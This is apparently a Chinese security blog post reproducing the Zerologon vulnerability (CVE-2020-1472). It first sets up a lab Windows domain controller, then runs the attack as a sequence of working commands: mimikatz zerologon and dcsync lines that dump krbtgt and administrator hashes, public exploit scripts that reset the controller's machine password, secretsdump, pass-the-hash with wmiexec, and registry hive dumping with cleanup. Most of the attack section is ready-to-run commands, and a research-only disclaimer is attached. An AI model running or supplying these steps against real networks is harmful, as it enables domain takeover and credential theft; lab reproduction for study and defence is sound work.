CVE-2020-1472 windows域控提权 zerologon从搭建到复现

admin

140779
文章

117
评论

2020年10月26日12:09:45评论883 views字数 2088阅读6分57秒阅读模式

1，傻瓜化域安装

运行DCPROMO

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

第二步

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

第三步

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

第四步

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

第五步选择是

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

第六步设置完密码安装

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

第七步安装成功

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

加入域

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

登录设置好的域密码

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

从域服务器看是否成功

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

新建个域普通用户

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

登录到域

2，ZeroLogon复现

信息收集:

net time /domain && net user/domain

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

获取域ip

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

然后使用mimikatz进行攻击

执行poc

lsadump::zerologon/target:WIN-171DIUDNLE5.yourdomain.com /account:WIN-171DIUDNLE5$

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

使用exp攻击

lsadump::zerologon /target:WIN-171DIUDNLE5.yourdomain.com/account:WIN-171DIUDNLE5$ /exploit

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

尝试使用空密码登录域管

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

lsadump::dcsync /domain:yourdomain.com/dc:WIN-171DIUDNLE5.yourdomain.com /user:krbtgt /authuser:WIN-171DIUDNLE5$/authdomain:yourdomain /authpassword:"" /authntlm

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

导出hash

lsadump::dcsync /domain:yourdomain.com/dc:WIN-171DIUDNLE5.yourdomain.com /user:administrator /authuser:WIN-171DIUDNLE5$/authdomain:yourdomain /authpassword: /authntlm

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

解密获取明文

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

导出到文本

"lsadump::dcsync/domain:yourdomain.com /dc:WIN-171DIUDNLE5.yourdomain.com /user:administrator/authuser:WIN-171DIUDNLE5$ /authdomain:yourdomain /authpassword:/authntlm" >>1.txt

恢复密码

lsadump::postzerologon /target:yourip/account:WIN-171DIUDNLE5$

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

恢复后

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

密码会改成password updated里的内容

3，python实战复现

先用测试导出哈希测试渠道

1.git clone https://github.com/mstxq17/cve-2020-1472.git2.pip3 install -r requirements.txt

proxychains4 secretsdump.py topsectest/Administrator:'password'@yourip -just-dc-user "WIN-171DIUDNLE5$"

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

exp报错

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket && pip3 install .

测试是否存在漏洞:

proxychains python3 zerologon_tester.py WIN-171DIUDNLE5 yourip

成功

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

重置域密码：

proxychains python3 cve-2020-1472-exploit.py WIN-171DIUDNLE5 yourip

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

导出哈希

proxychains secretsdump.py yourdomain.com/WIN-171DIUDNLE5$@yourip-no-pass

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

执行命令

wmiexec.py -hashes  proxychains python3 /usr/local/bin/wmiexec.py-hashes aad3b435b51404eeaad3b435b51404ee:00affd88fa****4560bf9fef0ec2f username/Administrator@youip

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

恢复密码

- reg save HKLMSYSTEM system.save- reg save HKLMSAM sam.save- reg save HKLMSECURITY security.save- get system.save- get sam.save- get security.save- del /f system.save- del /f sam.save- del /f security.save

导出

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

下载到kail

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

提取

secretsdump.py -sam sam.save-system system.save -security security.save LOCAL

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

恢复

python3 restorepassword.py WIN-171DIUDNLE5@WIN-171DIUDNLE5 -target-ip yourip -hexpass 570061007a0061003100320*****a00610031003200330034002f00

本文始发于微信公众号（白帽100安全攻防实验室）：CVE-2020-1472 windows域控提权 zerologon从搭建到复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2020-1472 windows域控提权 zerologon从搭建到复现

2025攻防演练必修组件漏洞

从XSS到RCE的PC端利用链构建

玩转MCP第一弹｜手把手教你将 Figma 设计稿转化为前端代码

如何从漏洞POC或者EXP代码中学习漏洞原理？

如何日进后台系统

近年蓝军实战攻防战术演变

打靶日记 Escalate_Linux

常见的报文加密签名算法

使用 Terraform、Nebula、Caddy 和 Cobalt Strike 实现 C2 基础设施自动化

【DeepSeek实践】Mcp+DeepSeek的Demo编写体验

发表评论

在线咨询

微信